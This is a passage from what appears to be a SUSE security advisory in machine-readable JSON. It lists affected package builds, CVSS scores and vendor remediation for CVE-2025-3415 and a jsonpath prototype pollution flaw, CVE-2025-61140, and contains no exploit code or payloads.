"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "moderate"
}
],
"title": "CVE-2025-3415"
},
{
"cve": "CVE-2025-61140",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-61140"
}
],
"notes": [
{
"category": "general",
"text": "The value function in jsonpath 1.1.1 lib/index.js is vulnerable to Prototype Pollution.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-61140",
"url": "https://www.suse.com/security/cve/CVE-2025-61140"
},
{
"category": "external",
"summary": "SUSE Bug 1257442 for CVE-2025-61140",
"url": "https://bugzilla.suse.com/1257442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
